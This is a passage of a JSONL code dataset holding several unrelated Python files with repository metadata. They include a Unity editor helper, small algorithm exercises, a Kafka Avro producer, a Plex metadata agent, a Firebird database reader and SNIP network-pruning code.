tuple(map(int, regex_match.groups()))\n\n return UnityVersion(*version)\n\n\ndef __get_version_linux(app: str) -> UnityVersion:\n return UnityVersion(0, 0, 0, 0)\n\n\ndef __get_version_windows(app: str) -> UnityVersion:\n line_num = 1\n version = 0, 0, 0, 0\n version_str = str()\n\n def log_func(line: str):\n nonlocal line_num\n nonlocal version_str\n if line_num == 4:\n version_str = line.rstrip()\n line_num += 1\n\n app = app.replace('\\\\', '\\\\\\\\')\n return_code = run_process(['wmic', 'datafile', 'where', f'Name=\"{app}\"', 'get', 'Version'], log_func=log_func)\n\n if return_code == 0 and version_str:\n regex_match = match(': (\\\\d+).(\\\\d+).(\\\\d+).(\\\\d+)', version_str)\n version = tuple(map(int, regex_match.groups()))\n\n return UnityVersion(*version)\n\n\nunity_platform = {\n 'Darwin': {\n 'app': 'Unity.app',\n 'exec': 'Unity.app/Contents/MacOS/Unity',\n 'data': 'Unity.app/Contents',\n 'libcache': [\n 'Unity.app/Contents/Managed/UnityEngine',\n 'Unity.app/Contents/Resources/PackageManager/ProjectTemplates/libcache',\n ],\n 'mono_bin': 'Unity.app/Contents/MonoBleedingEdge/bin',\n 'mcs': 'Unity.app/Contents/MonoBleedingEdge/bin/mcs',\n 'find': (__find_darwin, ['/Applications']),\n 'get_version': __get_version_darwin\n },\n 'Linux': {\n 'app': 'Editor/Unity',\n 'exec': 'Editor/Unity',\n 'data': 'Editor/Data',\n 'libcache': [\n 'Editor/Data/Managed/UnityEngine',\n 'Editor/Data/Resources/PackageManager/ProjectTemplates/libcache',\n ],\n 'mono_bin': 'Editor/Data/MonoBleedingEdge/bin',\n 'mcs': 'Editor/Data/MonoBleedingEdge/bin/mcs',\n 'find': (__find_linux, ['/opt']),\n 'get_version': __get_version_linux\n },\n 'Windows': {\n 'app': 'Editor/Unity.exe',\n 'exec': 'Editor/Unity.exe',\n 'data': 'Editor/Data',\n 'libcache': [\n 'Editor/Data/Managed/UnityEngine',\n 'Editor/Data/Resources/PackageManager/ProjectTemplates/libcache',\n ],\n 'mono_bin': 'Editor/Data/MonoBleedingEdge/bin',\n 'mcs': 'Editor/Data/MonoBleedingEdge/bin/mcs.bat',\n 'find': (__find_windows, ['C:/Program Files', 'C:/Program Files (x86)']),\n 'get_version': __get_version_windows\n },\n}\n\n\nclass UnityEditor(object):\n\n path: Path\n exec: Path\n mcs: Path\n version: UnityVersion\n\n def __init__(self, editor_dir: str):\n sys = system()\n self.path = Path(editor_dir)\n self.exec = self.path / unity_platform[sys]['exec']\n self.mcs = self.path / unity_platform[sys]['mcs']\n self.version = unity_platform[sys]['get_version'](str(self.path / unity_platform[sys]['app']))\n\n if not self.exec.exists():\n raise Exception('Executable not found')\n\n def __repr__(self):\n return str(self.path)\n\n @staticmethod\n def find_all(*args: str) -> List[UnityEditor]:\n sys = system()\n if sys not in unity_platform.keys():\n raise NotImplementedError\n func, dirs = unity_platform[sys]['find']\n search_dirs = []\n search_dirs.extend(dirs if len(args) == 0 else\n list(filter(lambda p: Path(p).is_dir(), args)))\n editor_dirs = []\n for d in search_dirs:\n editor_dirs.extend(func(d))\n editors = [UnityEditor(e) for e in editor_dirs]\n\n return editors\n\n @staticmethod\n def find_in(*args: str,\n cache: str = None) -> List[UnityEditor]:\n if cache is not None:\n cache_path = Path(cache)\n if cache_path.exists():\n editor_dirs = loads(cache_path.read_text())\n return [UnityEditor(e) for e in editor_dirs]\n else:\n editors = UnityEditor.find_all(*args)\n editor_dirs = [str(e) for e in editors]\n cache_path.touch()\n cache_path.write_text(dumps(editor_dirs, indent=2))\n return editors\n else:\n return UnityEditor.find_all(*args)\n\n @staticmethod\n def find_libcache(editor: UnityEditor) -> List[str]:\n return [str(editor.path / d) for d in unity_platform[system()]['libcache']]\n\n @staticmethod\n def find_libs(editor: UnityEditor) -> List[str]:\n libs = {}\n for d in editor.get_libcache():\n libcache_path = Path(d)\n for root, _, files in walk(str(libcache_path)):\n root_path = Path(root)\n for f in files:\n file_path = Path(f)\n if not '.dll' == file_path.suffix:\n continue\n file_name = str(file_path.name)\n if file_name in libs.keys():\n continue\n libs[file_name] = str(root_path / file_path)\n\n return list(libs.values())\n\n def compile(self, *args: str,\n defines: List[str] = None,\n debug: bool = False,\n doc: str = None,\n nostdlib: bool = False,\n nowarn: List[str] = None,\n optimize: bool = False,\n out: str = None,\n references: List[str] = None,\n stacktrace: bool = False,\n target: str = None,\n unsafe: bool = False,\n warnaserror: List[str] = None,\n log_func: Callable[[str], None] = None) -> int:\n cwd_path = Path(getcwd())\n tmp_path = cwd_path / f'tmp-{datetime.now().strftime(\"%Y%m%d%H%M%S\")}'\n tmp_path.mkdir()\n command = [str(self.mcs)]\n if defines is not None:\n command.append(f'-d:{\";\".join(defines)}')\n if debug:\n command.append('-debug')\n if doc is not None:\n command.append(f'-doc:{doc}')\n if nostdlib:\n command.append('-nostdlib')\n if nowarn is not None:\n command.append(f'-nowarn:{\",\".join(nowarn)}')\n if optimize:\n command.append('-optimize')\n if out is not None:\n command.append(f'-out:{out}')\n refs = []\n for r in references if references is not None else []:\n r_path = Path(r)\n if r_path.exists():\n r_name = r_path.name\n copyfile(str(r_path), str(tmp_path / r_name))\n refs.append(r_name)\n if len(refs) > 0:\n command.append(f'-r:{\",\".join(refs)}')\n if stacktrace:\n command.append('--stacktrace')\n if target is not None and target in ['exe', 'library', 'module', 'winexe']:\n command.append(f'-t:{target}')\n if unsafe:\n command.append('-unsafe')\n if warnaserror is not None:\n command.append(f'-warnaserror:{\",\".join(warnaserror)}')\n for f in args:\n f_path = Path(f)\n if f_path.exists():\n f_name = f_path.name\n copyfile(str(f_path), str(tmp_path / f_name))\n command.append('*.cs')\n try:\n chdir(str(tmp_path))\n return_code = run_process(command, log_func=log_func)\n if return_code == 0:\n if out is not None:\n out_path = tmp_path / out\n if out_path.exists():\n move(str(out_path), str(cwd_path / out))\n if doc is not None:\n doc_path = tmp_path / doc\n if doc_path.exists():\n move(str(doc_path), str(cwd_path / doc))\n finally:\n chdir(str(cwd_path))\n rmtree(str(tmp_path), ignore_errors=True)\n\n return return_code\n\n def get_libcache(self) -> List[str]:\n return UnityEditor.find_libcache(self)\n\n def get_libs(self) -> List[str]:\n return UnityEditor.find_libs(self)\n\n def run(self, *args: str,\n cli: bool = True,\n log_func: Callable[[str], None] = None) -> int:\n command = [str(self.exec)]\n command.extend(args)\n if cli:\n for o in ['-batchmode', '-nographics', '-quit', '-silent-crashes']:\n if o not in command:\n command.append(o)\n\n return run_process(command, log_func=log_func)\n","repo_name":"Fopoon/funity","sub_path":"funity/unity_editor.py","file_name":"unity_editor.py","file_ext":"py","file_size_in_byte":10397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"42555849730","text":"def maximum69Number (num):\n \"\"\"\n :type num: int\n :rtype: int\n \"\"\"\n num = str(num)\n results = [int(num)]\n for i in range(0, len(num)):\n curr = num[i]\n newnum = list(num)\n if curr == '6':\n newnum[i] = '9'\n results.append(int(''.join(newnum)))\n return max(results)\n ","repo_name":"salitayu/daily-programming","sub_path":"maximum69Number.py","file_name":"maximum69Number.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"29797273837","text":"#algorimo de la burbuja para adivinar numeros( entre 0-100)\nimport random\nlower = 0\nupper = 100\ndecidir = \"n\"\nwhile decidir == \"n\":\n numeroResultado = random.randrange(lower,upper)\n decidir = input(f\"Tu numero es {numeroResultado} (s/n): \")\n if decidir == \"n\":\n pista = input(\"El número es mayor o menor(h/l): \")\n if pista == \"h\":\n lower = numeroResultado+1\n if pista ==\"l\":\n upper = numeroResultado","repo_name":"alejoc13/IA-models","sub_path":"adivinar_numero.py","file_name":"adivinar_numero.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40641002780","text":"from confluent_kafka import SerializingProducer\nfrom confluent_kafka.serialization import StringSerializer\nfrom confluent_kafka.schema_registry import SchemaRegistryClient\nfrom confluent_kafka.schema_registry.avro import AvroSerializer\nfrom confluent_kafka.schema_registry import record_subject_name_strategy\nfrom datetime import datetime\nimport toml\nimport argparse\nfrom sensor import sensor\nfrom time import sleep\n\n\nclass Event(object):\n \"\"\"\n An object representing a sensor event\n\n Args:\n id (str): Sensor's id\n\n timestamp (datetime): timestamp when the event happened\n\n value (double): Sensor's reading value\n\n \"\"\"\n def __init__(self, id, timestamp, value):\n self.id = id\n self.timestamp = timestamp\n self.value = value\n\n\ndef event_to_dict(event, ctx):\n \"\"\"\n Returns a dict representation of a sensor Event instance for serialization.\n\n Args:\n event (Event): Event instance.\n\n ctx (SerializationContext): Metadata pertaining to the serialization\n operation.\n\n Returns:\n dict: Dict populated with sensor event attributes to be serialized.\n\n \"\"\"\n return dict(id=event.id,\n timestamp=event.timestamp,\n value=event.value)\n\n\ndef delivery_report(err, msg):\n \"\"\"\n Reports the failure or success of a message delivery.\n\n Args:\n err (KafkaError): The error that occurred on None on success.\n\n msg (Message): The message that was produced or failed.\n\n Note:\n In the delivery report callback the Message.key() and Message.value()\n will be the binary format as encoded by any configured Serializers and\n not the same object that was passed to produce().\n If you wish to pass the original object(s) for key and value to delivery\n report callback we recommend a bound callback or lambda where you pass\n the objects along.\n\n \"\"\"\n if err is not None:\n print(\"Delivery failed for sensor Event {}: {}\".format(msg.key(), err))\n return\n print('Sensor Event {} successfully produced to {} [{}] at offset {}'.format(\n msg.key(), msg.topic(), msg.partition(), msg.offset()))\n\n\ndef main():\n\n # Parse arguments\n parser = argparse.ArgumentParser(description='Produces time series data from emulated '\n 'sensors into a kafka topic hosted at a HopsWorks cluster.')\n parser.add_argument(\"-c\", \"--config\", default='config.toml',\n help='Configuration file in toml format.')\n parser.add_argument(\"-t\", \"--time\", default=0, type=int,\n help='Start time step for the time series generator. Used to resume '\n 'generating the time series after stopping the program.')\n parser.add_argument(\"-e\", \"--events\", default=1000, type=int,\n help='Number of events to generate per sensor. Negative for infinite number.')\n parser.add_argument(\"-d\", \"--delay\", default=0.5, type=float,\n help='Delay between events in second. Can be float.')\n args = parser.parse_args()\n\n # Load HopsWorks Kafka configuration\n conf = toml.load(args.config)\n\n # Kafka schema that this program supports/expects\n # The schema will be checked against the schema of the Kafka topic\n schema_str = \"\"\"\n {\n \"type\": \"record\",\n \"name\": \"sensor\",\n \"fields\": [\n {\n \"name\": \"timestamp\",\n \"type\": {\n \"type\": \"long\",\n \"logicalType\": \"timestamp-millis\"\n }\n },\n {\n \"name\": \"id\",\n \"type\": \"string\"\n },\n {\n \"name\": \"value\",\n \"type\": \"double\"\n }\n ]\n }\n \"\"\"\n\n # url for the schema registry in HopsWorks REST API services\n registry_url = 'https://' + conf['hops']['url']\\\n + conf['api']['base'] + '/project/'+conf['project']['id']+'/kafka'\n\n # Initialise the Confluent schema registry client\n schema_registry_conf = {'url': registry_url, 'ssl.ca.location': conf['hops']['verify']}\n schema_registry_client = SchemaRegistryClient(schema_registry_conf)\n\n # Add the API key required by HopsWorks but not configurable through the confluent schema registry client\n headers = {'Authorization': 'ApiKey ' + conf['api']['key']}\n schema_registry_client._rest_client.session.headers.update(headers)\n\n # Initialize the avro serializer for the value using the schema\n avro_serializer = AvroSerializer(schema_registry_client,\n schema_str,\n event_to_dict,\n {'auto.register.schemas': False, 'subject.name.strategy': record_subject_name_strategy})\n\n # Initialize a simple String serializer for the key\n string_serializer = StringSerializer('utf_8')\n\n # Initialize the producer\n producer_conf = {'bootstrap.servers': conf['hops']['url']+':'+conf['kafka']['port'],\n 'security.protocol': 'SSL',\n 'ssl.ca.location': conf['project']['ca_file'],\n 'ssl.certificate.location': conf['project']['certificate_file'],\n 'ssl.key.location': conf['project']['key_file'],\n 'ssl.key.password': conf['project']['key_password'],\n 'key.serializer': string_serializer,\n 'value.serializer': avro_serializer}\n producer = SerializingProducer(producer_conf)\n\n # Initialize a number of sensors\n start = args.time\n end = start + args.events if args.events > 0 else -1\n sensors = [\n sensor(baseline=10, slope=0.1, period=100, amplitude=40, noise_level=5, start=start, end=end),\n sensor(baseline=10, slope=0.2, period=50, amplitude=30, noise_level=4, start=start, end=end),\n sensor(baseline=20, slope=-0.1, period=100, amplitude=50, noise_level=6, phase=20, start=start, end=end),\n sensor(baseline=10, slope=0.1, period=100, amplitude=40, noise_level=0, start=start, end=end),\n sensor(baseline=30, slope=-0.1, period=100, amplitude=40, noise_level=5, start=start, end=end),\n sensor(baseline=40, slope=0, period=200, amplitude=10, noise_level=4, start=start, end=end),\n sensor(baseline=0, slope=0.3, period=100, amplitude=20, noise_level=6, phase=50, start=start, end=end),\n sensor(baseline=-10, slope=0.1, period=100, amplitude=40, noise_level=9, start=start, end=end),\n ]\n\n # Start producing events\n print(\"Producing sensor events to topic {}.\".format(conf['kafka']['topic']))\n print('Press Ctrl-c to exit.')\n time_step = start # a counter for the number of time steps generated\n try:\n for data in zip(*sensors):\n timestamp = datetime.now()\n time_step += 1\n for i, d in enumerate(data):\n # Serve on_delivery callbacks from previous calls to produce()\n producer.poll(0.0)\n try:\n event = Event(id='sensor'+str(i),\n timestamp=timestamp,\n value=d)\n producer.produce(topic=conf['kafka']['topic'], key=event.id, value=event,\n on_delivery=delivery_report)\n except KeyboardInterrupt:\n break\n except ValueError:\n print(\"Invalid input, discarding record...\")\n continue\n sleep(args.delay)\n except KeyboardInterrupt:\n print('\\nStopping...')\n\n print(\"Flushing records...\")\n producer.flush()\n print('To continue execution start from event {}'.format(time_step))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"alshishtawy/hopsworks-examples","sub_path":"kafka/avro_producer.py","file_name":"avro_producer.py","file_ext":"py","file_size_in_byte":7797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"1272156114","text":"# -*- coding: utf-8 -*-\nfrom meta import KinopoiskMeta, MovieDBMeta\n\n\ndef Start():\n HTTP.CacheTime = CACHE_1WEEK\n\n\nclass KinopoiskAgent(Agent.Movies):\n name = 'Kinopoisk'\n languages = [Locale.Language.Russian]\n primary_provider = True\n fallback_agent = False\n accepts_from = ['com.plexapp.agents.localmedia']\n contributes_to = ['com.plexapp.agents.kinopoiskru']\n\n # search #\n def search(self, results, media, lang, manual=False):\n continuesearch = True\n kp = KinopoiskMeta(media, lang)\n if media.guid:\n continuesearch = kp.external_search(results, manual)\n if continuesearch:\n kp.search(results, manual)\n\n # update #\n def update(self, metadata, media, lang, force=False):\n if not metadata.id:\n return None\n kp = KinopoiskMeta(media, lang)\n kp.getdata(metadata, force)\n\n mdb = MovieDBMeta(media, lang)\n mdb.getdata(metadata, force)\n \n #extras\n if Prefs['extras_source'] == u'Plex IVA':\n mdb.extras(metadata)\n elif Prefs['extras_source'] == u'Кинопоиск':\n kp.extras(metadata)\n elif Prefs['extras_source'] == u'Все источники':\n if Prefs['extras_seq'] == u'Кинопоиск, Plex IVA':\n kp.extras(metadata)\n if len(metadata.extras) == 0:\n mdb.extras(metadata)\n elif Prefs['extras_seq'] == u'Plex IVA, Кинопоиск':\n mdb.extras(metadata)\n if len(metadata.extras) == 0:\n kp.extras(metadata)\n else:\n kp.extras(metadata)\n mdb.extras(metadata)","repo_name":"OMEGAYALFA/Kinopoisk","sub_path":"Kinopoisk.bundle/Contents/Code/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73564102238","text":"'''\r\n\tGiven a string S, consider all duplicated substrings: (contiguous) substrings of S that occur 2 or more times. (The occurrences may overlap.)\r\n\r\nReturn any duplicated substring that has the longest possible length. (If S does not have a duplicated substring, the answer is \"\".)\r\n\r\n \r\n\r\nExample 1:\r\n\r\nInput: \"banana\"\r\nOutput: \"ana\"\r\nExample 2:\r\n\r\nInput: \"abcd\"\r\nOutput: \"\"\r\n \r\n\r\nNote:\r\n\r\n2 <= S.length <= 10^5\r\nS consists of lowercase English letters.\r\n Hide Hint #1 \r\nBinary search for the length of the answer. (If there's an answer of length 10, then there are answers of length 9, 8, 7, ...)\r\n Hide Hint #2 \r\nTo check whether an answer of length K exists, we can use Rabin-Karp 's algorithm.\r\n\r\n\r\n'''\r\n\r\nfrom collections import defaultdict\r\n\r\nPRIME = 10 ** 9 + 7\r\nBASE = 26\r\nclass Solution:\r\n def longestDupSubstring(self, S: str) -> str:\r\n def obtain_dup_substring(S, len_substr):\r\n max_base = pow(BASE, len_substr - 1, PRIME)\r\n hash = 0\r\n for char in S[:len_substr]:\r\n hash = (hash * BASE + ord(char)) % PRIME\r\n hash_to_idx = defaultdict(list)\r\n hash_to_idx[hash].append(len_substr - 1)\r\n for i, char in enumerate(S[len_substr:], start=len_substr):\r\n char_deleted = S[i - len_substr]\r\n hash -= ord(char_deleted) * max_base\r\n hash = (hash * BASE + ord(char)) % PRIME\r\n if hash in hash_to_idx:\r\n substr = S[i - len_substr + 1:i + 1]\r\n for end_idx in hash_to_idx[hash]:\r\n if S[end_idx - len_substr + 1:end_idx + 1] == substr:\r\n return substr\r\n else:\r\n hash_to_idx[hash].append(i)\r\n else:\r\n hash_to_idx[hash].append(i)\r\n return \"\"\r\n\r\n max_possible_len, min_impossble_len = 0, len(S)\r\n result = \"\"\r\n while min_impossble_len - max_possible_len > 1:\r\n length_in_middle = (max_possible_len + min_impossble_len) // 2\r\n substr = obtain_dup_substring(S, length_in_middle)\r\n if substr:\r\n result = substr\r\n max_possible_len = length_in_middle\r\n else:\r\n min_impossble_len = length_in_middle\r\n return result","repo_name":"Gangadharbhuvan/30_Days_Leetcode_Challenge-June-","sub_path":"Day-19_Longest_Subset_Substring.py","file_name":"Day-19_Longest_Subset_Substring.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"2670418074","text":"# -*- coding: utf-8 -*-\nimport struct\nfrom collections import namedtuple\n\n\nclass TableReader(object):\n '''Abstract class for talbe read\n Need to define:\n TABLE_NAME\n or RELATION_ID if table RDB$RELATION not red yet\n or PAGE_NUMBER to read RDB$PAGES\n '''\n TABLE_NAME = None\n RELATION_ID = None\n PAGE_NUMBER = None\n\n def __init__(self, db_reader):\n assert self.TABLE_NAME or self.RELATION_ID or self.PAGE_NUMBER\n self.db_reader = db_reader\n\n def _find_relation(self):\n relation_list = list(filter(lambda x: x.p_relation_name == self.TABLE_NAME, self.db_reader.relations))\n assert len(relation_list) == 1\n return relation_list[0]\n\n def _find_pointer_page(self, relation_id):\n pages = list(filter(lambda x: x.p_relation_id == relation_id, self.db_reader.pages_table))\n pages_pointer = list(filter(lambda x: x.p_page_type == 4, pages))\n assert len(list(pages_pointer)) == 1\n return pages_pointer[0]\n\n def get_rows(self):\n if self.TABLE_NAME:\n relation = self._find_relation()\n pointer_page = self._find_pointer_page(relation.p_relation_id)\n ppage = self.db_reader.read_page(pointer_page.p_page_number)\n\n if self.RELATION_ID:\n pointer_page = self._find_pointer_page(self.RELATION_ID)\n ppage = self.db_reader.read_page(pointer_page.p_page_number)\n\n if self.PAGE_NUMBER:\n ppage = self.db_reader.read_page(self.PAGE_NUMBER)\n\n page_list = [ppage]\n while ppage.ppg_next != 0:\n ppage = self.db_reader.read_page(ppage.ppg_next)\n page_list.append(ppage)\n\n for ppage in page_list:\n for page in ppage.ppg_page:\n if page['address'] == 0:\n # Free page\n continue\n data_page = self.db_reader.read_page(page['address'])\n assert data_page.header.pag_type == 5, 'must links to Data Pages'\n\n # Check bit parser in bitmap\n # TODO DEBUG\n # if data_page.header.pag_flags & 0b10:\n # assert page['full'] == 1\n # else:\n # assert page['full'] == 0\n if data_page.header.pag_flags & 0b100:\n assert page['has_large_obj'] == 1\n else:\n assert page['has_large_obj'] == 0\n\n for pages_row in data_page.dpg_rpt:\n if pages_row.rhd_blob or \\\n pages_row.rhd_stream_blob_or_rhd_delta:\n continue\n\n if pages_row.rhd_incomplete:\n continue\n\n data = pages_row.data_uncompressed\n if pages_row.rhd_fragment:\n continue\n\n # while pages_row.rhd_fragment:\n # _p = self.db_reader.read_page(pages_row.rhdf_f_page)\n # print(pages_row.rhdf_f_page, pages_row.rhdf_f_line)\n # pages_row = _p.dpg_rpt[pages_row.rhdf_f_line]\n # print(data)\n # data += pages_row.data_uncompressed\n # print(data)\n # print()\n # # exit(0)\n\n # TODO: know why data is empty\n if not data:\n continue\n # HACK, becose sometimes we cant parse row and return Null\n row = self.parse_row_data(data)\n if row:\n yield row\n\n def parse_row_data(self, data):\n raise NotImplementedError()\n\n\nclass Table_RdbPages(TableReader):\n '''List all pages in database file. page_number of first page can get from db_header'''\n def __init__(self, db_reader, **kwargs):\n self.PAGE_NUMBER = db_reader.db_header.hdr_PAGES\n super().__init__(db_reader, **kwargs)\n\n def parse_row_data(self, data):\n p_unknown, p_page_number, p_relation_id, p_page_seq, p_page_type = struct.unpack_from(' 0)\n return diff_num\n\n\ndef get_pretrain_pruned_unet(opts, in_model, origin_model, channel_mask, verbose=False):\n Print(\"Copy pretrained weights...\", color=\"g\")\n if isinstance(channel_mask[0], torch.Tensor):\n channel_mask = [c.cpu().numpy().tolist() for c in channel_mask]\n elif isinstance(channel_mask[0], np.ndarray):\n channel_mask = [c.tolist() for c in channel_mask]\n\n new_model = copy.deepcopy(in_model)\n\n Print(\"Input chs:\", [len(c) for c in channel_mask], color=\"y\")\n\n layer_idx = 0\n start_mask, end_mask = [1], channel_mask[layer_idx]\n unet_concat_config = {15: 1, 12: 3, 9: 5}\n prev_masks = {}\n for i, (m0, m1) in enumerate(\n zip(origin_model.modules(), new_model.modules())\n ): # conv->bn order\n keep_prev_mask = True if layer_idx in unet_concat_config.values() else False\n restore_prev_mask = True if layer_idx in unet_concat_config.keys() else False\n\n if isinstance(m0, nn.BatchNorm3d):\n idx1 = np.squeeze(np.argwhere(end_mask))\n if idx1.size == 1:\n idx1 = np.resize(idx1, (1,))\n Print(\n \" Batch3D channel:\", len(end_mask), \"m0 w-shape:\", m0.weight.data.shape\n )\n assert (\n m1.weight.data.shape == m0.weight.data[idx1.tolist()].shape\n ), \"Dim mismatch {}!={}\".format(\n m1.weight.data.shape, m0.weight.data[idx1.tolist()].shape\n )\n assert (\n m1.bias.data.shape == m0.bias.data[idx1.tolist()].shape\n ), \"Dim mismatch {}!={}\".format(\n m1.bias.data.shape, m0.bias.data[idx1.tolist()].shape\n )\n\n m1.weight.data = m0.weight.data[idx1.tolist()].clone()\n m1.bias.data = m0.bias.data[idx1.tolist()].clone()\n m1.num_batches_tracked = m0.num_batches_tracked.clone()\n m1.running_mean = m0.running_mean[idx1.tolist()].clone()\n m1.running_var = m0.running_var[idx1.tolist()].clone()\n layer_idx += 1\n start_mask = end_mask.copy()\n if layer_idx < len(channel_mask): # do not change in Final FC\n end_mask = channel_mask[layer_idx]\n elif isinstance(m0, PrunableWeights):\n if keep_prev_mask:\n prev_masks[layer_idx] = [start_mask, end_mask]\n\n if restore_prev_mask:\n old_mask = prev_masks[unet_concat_config[layer_idx]]\n start_mask = np.concatenate((np.array(old_mask[1]), start_mask))\n Print(\n \"Restore prev {}th to {}th: {} -> {}:\".format(\n unet_concat_config[layer_idx],\n layer_idx,\n len(old_mask[1]),\n len(start_mask),\n ),\n color=\"y\",\n verbose=verbose,\n )\n assert (\n len(start_mask) == m0.weight.data.shape[1]\n and len(end_mask) == m0.weight.data.shape[0]\n ), \"Channel mismatch at {}-{},{}-{}\".format(\n len(start_mask),\n m0.weight.data.shape[1],\n len(end_mask),\n m0.weight.data.shape[0],\n )\n\n if isinstance(m0, PrunableConv3d):\n idx0 = np.squeeze(np.argwhere(start_mask))\n idx1 = np.squeeze(np.argwhere(end_mask))\n else:\n idx1 = np.squeeze(np.argwhere(start_mask))\n idx0 = np.squeeze(np.argwhere(end_mask))\n\n Print(\n \"OriLayer {}:{}\\n In channel: {:d}->{:d}, Out channel {:d}->{:d}\\n\".format(\n layer_idx, m0, len(start_mask), idx0.size, len(end_mask), idx1.size\n ),\n color=\"g\",\n verbose=verbose,\n )\n\n if idx0.size == 1:\n idx0 = np.resize(idx0, (1,))\n if idx1.size == 1:\n idx1 = np.resize(idx1, (1,))\n w1 = m0.weight.data[:, idx0.tolist(), ...].clone()\n w1 = w1[idx1.tolist(), ...].clone()\n\n assert (\n m1.weight.data.shape == w1.shape\n ), \"Weight dim mismatch {}!={}\".format(m1.weight.data.shape, w1.shape)\n m1.weight.data = w1.clone()\n\n if isinstance(m0, PrunableDeconv3d):\n idx1 = idx0\n\n assert (\n m1.bias.data.shape == m0.bias.data[idx1.tolist()].shape\n ), \"Bias dim mismatch {}!={}\".format(\n m1.bias.data.shape, m0.bias.data[idx1.tolist()].shape\n )\n m1.bias.data = m0.bias.data[idx1.tolist()].clone()\n\n if isinstance(m0, PrunableDeconv3d):\n layer_idx += 1\n start_mask = end_mask.copy()\n if layer_idx < len(channel_mask):\n end_mask = channel_mask[layer_idx]\n elif isinstance(m0, nn.Conv3d): # last classify conv\n idx0 = np.squeeze(np.argwhere(start_mask))\n w1 = m0.weight.data[:, idx0.tolist(), ...].clone()\n assert (\n m1.weight.data.shape == w1.shape\n ), \"Weight dim mismatch {}!={}\".format(m1.weight.data.shape, w1.shape)\n m1.weight.data = w1.clone()\n m1.bias.data = m0.bias.data.clone()\n\n return new_model\n\n\ndef SNIP(\n input_net,\n prepare_batch_fn,\n loss_fn,\n keep_ratio,\n train_dataloader,\n device=\"cpu\",\n output_dir=None,\n):\n # TODO: shuffle?\n # Grab a single batch from the training dataset\n batchdata = next(iter(train_dataloader))\n batch = prepare_batch_fn(batchdata, device, False)\n if len(batch) == 2:\n inputs, targets = batch\n else:\n raise NotImplementedError\n\n if isinstance(inputs, (tuple, list)): # multiple inputs\n spatial_ndim = inputs[0].ndim - 2\n else:\n spatial_ndim = inputs.ndim - 2 # assume inputs dim [BCHWD]or[BCHW]\n if spatial_ndim not in [2, 3]:\n raise ValueError(\n f\"Currently only support 2&3D data, but got dim={spatial_ndim}\"\n )\n\n # Let's create a fresh copy of the network so that we're not worried about\n # affecting the actual training-phase\n net = copy.deepcopy(input_net).to(device)\n\n # Monkey-patch the Linear and Conv2d layer to learn the multiplicative mask\n # instead of the weights\n for layer in net.modules():\n if isinstance(layer, PrunableWeights):\n layer.weight_mask = nn.Parameter(torch.ones_like(layer.weight))\n nn.init.xavier_normal_(layer.weight)\n layer.weight.requires_grad = False\n\n if spatial_ndim == 3:\n snip_conv_forward = snip_forward_conv3d\n snip_deconv_forward = snip_forward_deconv3d\n elif spatial_ndim == 2:\n snip_conv_forward = snip_forward_conv2d\n snip_deconv_forward = snip_forward_deconv2d\n\n # Override the forward methods:\n if isinstance(layer, (PrunableConv3d, PrunableConv2d)):\n layer.forward = types.MethodType(snip_conv_forward, layer)\n\n if isinstance(layer, (PrunableDeconv3d, PrunableDeconv2d)):\n layer.forward = types.MethodType(snip_deconv_forward, layer)\n\n if isinstance(layer, PrunableLinear):\n layer.forward = types.MethodType(snip_forward_linear, layer)\n\n # Compute gradients (but don't apply them)\n net.zero_grad()\n outputs = net.forward(inputs)\n if outputs.shape != targets.shape and 1 in outputs.shape:\n outputs.squeeze_()\n loss = loss_fn(outputs, targets)\n loss.backward()\n\n grads_abs = []\n for layer in net.modules():\n if isinstance(layer, PrunableWeights):\n # Print('Layer:', layer, 'weight shape:', layer.weight_mask.shape, color='r')\n grads_abs.append(torch.abs(layer.weight_mask.grad))\n # if isinstance(layer, nn.BatchNorm3d):\n # Print('BN:', layer, 'bn shape:', layer.weight.shape, color='y')\n assert len(grads_abs) != 0, \"No prunable layer defined in the network\"\n\n # Gather all scores in a single vector and normalise\n all_scores = torch.cat([torch.flatten(x) for x in grads_abs])\n norm_factor = torch.sum(all_scores)\n all_scores.div_(norm_factor)\n\n if keep_ratio > 0:\n num_params_to_keep = int(len(all_scores) * keep_ratio)\n threshold, _ = torch.topk(all_scores, num_params_to_keep, sorted=True)\n acceptable_score = threshold[-1]\n else:\n acceptable_score = np.mean(all_scores)\n\n keep_masks = []\n for g in grads_abs:\n msk = (g / norm_factor) >= acceptable_score\n if msk.any():\n keep_masks.append(msk.float())\n else:\n onehot = torch.zeros(len(msk))\n keep_masks.append(onehot.scatter_(0, torch.argmax(g), 1).float())\n\n # print(torch.sum(torch.cat([torch.flatten(x == 1) for x in keep_masks])))\n Print(\n \"Scores min:\",\n torch.min(all_scores),\n \"Scores max:\",\n torch.max(all_scores),\n \"Scores mean:\",\n torch.mean(all_scores),\n color=\"y\",\n )\n Print(\n \"Keep_masks ratio:\",\n [\n f\"{np.count_nonzero(m.cpu().numpy())/m.cpu().numpy().size:0.2f}\"\n for m in keep_masks\n ],\n color=\"y\",\n )\n if output_dir and os.path.isdir(output_dir):\n np.save(\n os.path.join(\n output_dir, \"snip_w_scores_{}.npy\".format(time.strftime(\"%H%M\"))\n ),\n all_scores.cpu().numpy(),\n )\n\n return keep_masks\n\n\ndef cSNIP(\n input_net,\n loss_fn,\n keep_ratio,\n train_dataloader,\n min_chs=3,\n use_cuda=True,\n output_dir=None,\n):\n # TODO: shuffle?\n\n # Grab a single batch from the training dataset\n inputs, targets = next(iter(train_dataloader))\n\n # Let's create a fresh copy of the network so that we're not worried about\n # affecting the actual training-phase\n net = copy.deepcopy(input_net)\n\n if use_cuda:\n inputs = inputs.cuda()\n targets = targets.cuda()\n net = net.cuda()\n\n # Monkey-patch the Linear and Conv2d layer to learn the multiplicative mask\n # instead of the weights\n for layer in net.modules():\n if isinstance(layer, (PrunableConv3d, 